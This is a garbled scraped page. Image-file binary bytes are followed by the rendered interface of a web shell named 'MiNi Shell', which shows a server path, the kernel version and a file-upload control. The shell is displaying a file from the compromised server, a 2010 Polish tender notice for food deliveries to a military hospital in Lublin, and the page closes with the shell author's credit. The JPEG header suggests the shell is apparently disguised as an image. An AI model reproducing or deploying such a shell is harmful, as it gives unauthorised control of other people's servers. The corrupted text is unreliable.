JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100414/105332-N-2010.html

<p class="kh_header"><b>Lublin: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 105332 - 2010; data zamieszczenia: 14.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 1 Szpital Wojskowy z Przychodnią Samodzielny Publiczny Zakład Opieki Zdrowotnej , Al. Racławickie 23, 20-904 Lublin, woj. lubelskie, tel. 081 7183203.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1szw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych  ;
Część nr  1. mrożonki;
Część nr 2. konserwy, przetwory owocowo - warzywne;
Część nr 3. olej, tłuszcze;
 Część nr 4. kasze, ryż;
 Część nr 5. przyprawy;
 Część nr 6. cukier; 
 Część nr 7. woda mineralna:
 Część nr 8. makaron;
 
2. Szczegółowy opis przedmiotu zamówienia  - zawarty jest w załączonyc do SIWZ formularzach cenowych na poszczególne części zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na   potwierdzenie   spełnienia   warunku   sytuacji   ekonomicznej   i   finansowej
Zamawiający wymaga:
opłaconej polisy ubezpieczenia OC, a w przypadku jej braku innego dokumentu
potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	Oświadczenie, że oferowane artykuły spożywcze są wytwarzane zgodnie z obowiązującymi przepisami polskiego prawa w zakresie żywności i żywienia. 
2)	Oświadczenie producenta potwierdzające wdrożenie i stosowanie systemu HACCP lub GHP w procesie produkcji i obrocie</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz cenowy sporządzony wg wzoru załączonego do SIWZ  oddzielnie dla każdej części.
Aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie
do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w celu potwierdzenia, iż oferta została podpisana przez osobę(-y) właściwie umocowaną, jeśli nie wynika to z innych dokumentów załączonych do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający zastrzega sobie prawo opcji, tzn.:
a)	jednostronnego zmniejszenia wielkości zamówienia na każdej z pozycji w obrębie danej części przedmiotu zamówienia (każdy asortyment) o maksimum 30% ilości ujętych w formularzu cenowym.
b)	zwiększenia ilości jednej pozycji, kompensując to zmniejszeniem ilości innej pozycji w obrębie danej części zamówienia, z zachowaniem cen jednostkowych zawartych w formularzu cenowym. Kompensacja nie może zmienić całkowitej wartości umowy
2.	Strony umowy zastrzegają sobie możliwość zmiany cen poszczególnych bądź niektórych pozycji asortymentu wchodzącego do przedmiotu niniejszej umowy. Zmiana cen może nastąpić proporcjonalnie do zmiany aktualnych cen żywności publikowanej przez Wojewódzki Urząd Statystyczny (WUS), odpowiedni do rejonu zaopatrywania Zamawiającego, w kwartalnych opracowaniach statystycznych.
3.	Zmiana cen, określona w ust. 2, może nastąpić na wniosek jednej ze stron umowy nie wcześniej niż po upływie trzech miesięcy od daty podpisania niniejszej umowy oraz nie częściej niż jeden raz na kwartał. W przypadku zgodnego zaakceptowania przez strony niniejszej umowy zmian w cenach asortymentu przedmiotu umowy, sporządzany jest stosowny aneks do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1szw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1 Szpital Wojskowy z Przychodnią Samodzielny Publiczny Zakład Opieki Zdrowotnej       Al. Racławickie 23, 20-904 Lublin, budynek nr 6, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2010 godzina 10:00, miejsce: 1 Szpital Wojskowy z Przychodnią Samodzielny Publiczny Zakład Opieki Zdrowotnej  Al. Racławickie 23, 20-904 Lublin, budynek nr 6, pokój nr 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część nr  1. mrożonki;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filety śledziowe całe a la matjas, 
	kg	30;
2	Panga mrożona - filety całe, 
	kg	180;
3	Dorsz - filety całe, 	kg	180;
4	Mintaj - filety całe, 	kg	180;
5	Morszczuk - filety całe, 
	kg	180;
6	Kalafior mrożony, 	kg	80;
7	Marchew mrożona, 	kg	700;
8	Mieszanka kompotowa mrożona,
7 składnikowa, 	kg	700;
9	Włoszczyzna mrożona, paski, 
5 składnikowa, 	kg	700;
10	Truskawka mrożona, 	kg	80;
11	Warzywa na patelnię, 
	kg	80;
12	Mieszanka kwiatowa mrożona, 
kg	300;
13	Szpinak mrożony, rozdrobniony, 
	kg	20;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> konserwy, przetwory owocowo - warzywne;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Marmolada wieloowocowa, twarda, opakowanie jedn. nie większe niż 1 kg, typu Prospona, Stoczek-Romir lub równoważna waga opakowania .....................................*	kg	400
2	Dżem niskosłodzony, różne smaki, opakowanie jedn. nie większe niż 1 kg, typu Łowicz, Materna lub równoważnywaga opakowania .....................................*	kg	400
3	Soki bobo frut lub równoważne, bez dodatku cukru, bez konserwantów, barwników i dodatków smakowych, opakowanie jedn. 170-200 ml pojemność opakowania .....................................*	szt.	1800
4	Skrobia ziemniaczana, opakowanie jedn. nie większe niż 1 kgwaga opakowania .....................................*	kg	260
5	Koncentrat pomidorowy, opakowanie jedn. nie większe niż 1 kg, typu Pudliszki lub równoważny waga opakowania .....................................*	kg	300
6	Musztarda kremska, opakowanie jedn. nie większe niż 1 kg waga opakowania .....................................*	kg	100
7	Musztarda sarepska, opakowanie jedn. nie większe niż 1 kg waga opakowania .....................................*	kg	100
8	Ketchup łagodny/pikantny, bez konserwantów, opakowanie jedn. nie większe niż 1 kg, typu Pudliszki, Kotlin lub równoważnywaga opakowania .....................................*	kg	200
9	Konserwa rybna - śledź w pomidorach, zawartość ryby min. 60%, bez konserwantów, termin przydatność do spożycia min. 10 m-cy od daty dostawy, puszka łatwo- otwieralna, opakowanie jedn. nie większe  niż 180g waga opakowania .....................................*	kg	70
10	Konserwa rybna - śledź w oleju, zawartość ryby min. 60%, bez konserwantów, termin przydatności do spożycia min. 10 m-cy od daty dostawy, puszka łatwo- otwieralna, opakowanie jedn. nie większe  niż 180 g waga opakowania .....................................*	kg	30
11	Konserwa rybna - makrela w  pomidorach, zawartość ryby min. 60%, bez konserwantów, termin przydatności do spożycia min. 10 m-cy od daty dostawy, puszka łatwootwieralna, opakowanie jedn. nie większe                niż 180 g waga opakowania .....................................*	kg	30
12	Konserwa rybna - makrela w oleju, zawartość ryby min. 60%, bez konserwantów, termin przydatności do spożycia min. 10 m-cy od daty dostawy, puszka łatwo- otwieralna,  opakowanie jedn. nie większe niż 180 g waga opakowania .....................................*	kg	30
13	Konserwa rybna - typu Paprykarz szczeciński, opakowanie jedn. nie większe niż 180 g, waga opakowania .....................................*	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> olej, tłuszcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Olej roślinny do smażenia, duszenia, pieczenia, sałatek i majonezu, z witaminą E, bez cholesterolu i konserwantów, op. min. 0,9 l	l	600
2	Margaryna zwykła do pieczenia, smażenia, duszenia i gotowania, produkowana w oparciu o oleje i tłuszcz roślinne, o zawartości tłuszczu co najmniej 60% z witaminami A, D3 i E, całość tłuszczu o jednolitej barwie, bez ciemnych słojów i nalotów jełczenia, op. 250 g 	kg	130
3	Masło roślinne do ciast, kremów, smarowania pieczywa, duszenia, bez cholesterolu i chemicznych konserwantów. Zawiera witaminy A, D, E, całość tłuszczu o jednolitej barwie, bez ciemnych słojów i nalotów jełczenia. Opakowanie jednostkowe - kostka w papierze pergaminowym lub folii aluminiowej lub kubeczek plastikowy min. 250 g.	kg	250
4	Margaryna Bielska do kremów i mas, do duszenia, o zawartości tłuszczu co najmniej 80 %, z zawartością mleka ukwaszonego, witamin A, D3, E, bez konserwantów, całość tłuszczu o jednolitej barwie, bez ciemnych słojów i nalotów jełczenia. Opakowanie jednostkowe - kostka o wadze - min 250 g w papierze pergaminowym lub folii aluminiowej.  	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> kasze, ryż;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kasza jęczmienna drobna, średnia, gruba, op. 1-50 kg	kg	500
2	Kasza gryczana palona, op. 1-50 kg	kg	400
3	Kasza manna op. 1-10 kg	kg	200
4	Płatki owsiane błyskawiczne op. 1 kg	kg	50
5	Płatki kukurydziane śniadaniowe, zwykłe bez dodatków (bez gotowania), op. 1 kg	kg	20
6	Ryż biały, cały, długi, op. 1-5 kg	kg	900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Przyprawa warzywna w proszku typu Warzywko lub równoważny, op.1-5 kg, min. 19 % warzyw suszonych	kg	140
2	Liść laurowy op. min. 400 g, I gat., bez zanieczyszczeń  	kg	6
3	Ziele angielskie op. 1 kg, I gat., bez zanieczyszczeń	kg	11
4	Papryka mielona op. 1 kg.  (łagodna, ostra) I gat., bez zanieczyszczeń	kg	10
5	Pieprz naturalny, mielony op. 1 kg, I gat., bez zanieczyszczeń	kg	17
6	Majeranek op.min. 400 g, I gat., bez zanieczyszczeń	kg	7
7	Kwasek cytrynowy op. 1 kg, I gat., bez zanieczyszczeń	kg	60
8	Zioła prowansalskie - mieszanka ziół: bazylia, majeranek, rozmaryn, szałwia, czomber, oregano, tymianek, mięta, op. min 400 g, I gat., bez zanieczyszczeń	kg	1
9	Bazylia op. min. 400 g, I gat., bez zanieczyszczeń	kg	1
10	Przyprawa w płynie do zup, sosów oraz dań mięsnych i warzywnych typu Winiary lub równoważny, bez konserwantów i sztucznych barwników, op. 1 l	l	300
11	Kakao sypkie o gorzkim, kakaowym smaku, mocnym aromacie i ciemnobrązowej barwie, niskotłuszczowe, op. min. 100 g 	kg	267
12	Galaretka różne smaki, składniki: cukier, żelatyna wieprzowa, regulator kwasowości - kwas cytrynowy, barwniki, bez konsewantów op. min. 70 g	kg	308
13	Kisiel bez cukru, bez konserwantów (różne smaki) op. min. 30 g	kg	70
14	Ananas w syropie - skład: plastry ananasa, woda, cukier, kwas cytrynowy, waga 560 g masa po odcieku 340 g	kg	20
15	Brzoskwinie w syropie - skład: brzoskwinie połówki, woda, cukier, kwas cytrynowy, waga 820g masa po odcieku 480 g	kg	20
16	Fasola sucha - Jaś średni, op. min. 1 kg	kg	90
17	Groch łuskany, połówki, op. min 1 kg	kg	100
18	Kawa zbożowa rozpuszczalna typu Inka, skład: jęczmień, żyto, cykoria, buraki cukrowe prażone, op. min. 200 g  	kg	30
19	Herbata granulowana czarna o mocnym smaku i aromacie, op. min. 90 g	kg	100
20	Sól spożywcza drobnokrystaliczna o barwie białej bez obcego zapachu, smak słony, bez obcego posmaku, bez zanieczyszczeń chemicznych, op. 1 kg - woreczek foliowy 	kg	700
21	Groszek zielony konserwowy - skład: świeży groszek, woda, cukier, sól, min. 60% masy po odcieku 	kg	300
22	Ogórki w zalewie octowej, o łagodnym smaku, z dodatkiem przypraw, bez konserwantów, typu Krakus lub równoważne, op. min. 900 g 	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> cukier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cukier - barwa biała, dopuszcza się odcień lekko kremowy, wygląd: kryształy sypkie bez zlepów i grudek, zapach: bez obcego zapachu,  smak: charakterystyczny dla cukru, zaw. sacharozy: nie mniej niż 99,5%, wilgotność: nie więcej niż 0,1%, op. 1 kg	kg	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 14.58.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> woda mineralna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Woda gazowana - naturalna woda mineralna, ogólna zawartość składników mineralnych min. 700 mg/l,  wysoko nasycona dwutlenkiem wegla, średnio zmineralizowana, op. 1,5 l 	l	1800
2	Woda niegazowana - naturalna woda mineralna ogólna zawartość składników mineralnych min. 700 mg/l, wysoko nasycona dwutlenkiem wegla, średnio zmineralizowana, op. 1,5 l	l	3200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> makarony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Makaron fala, opakowanie jedn. nie większe niż 2 kg waga opakowania ..................................*	kg	250
2	Makaron wstążka, opakowanie jedn. nie większe niż 2 kg waga opakowania ..................................*	kg	200
3	Makaron muszelka, opakowanie jedn. nie większe niż 2 kg waga opakowania ..................................*	kg	200
4	Makaron bączki, opakowanie jedn. nie większe niż 2 kg waga opakowania ..................................*	kg	200
5	Makaron spaghetti, opakowanie jedn. nie większe niż 2 kg waga opakowania ..................................*	kg	50
6	Makaron 4 jajeczny, z przeznaczeniem do rosołu - nitki, opakowanie jedn. nie większe niż 300 gwaga opakowania ..................................*	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com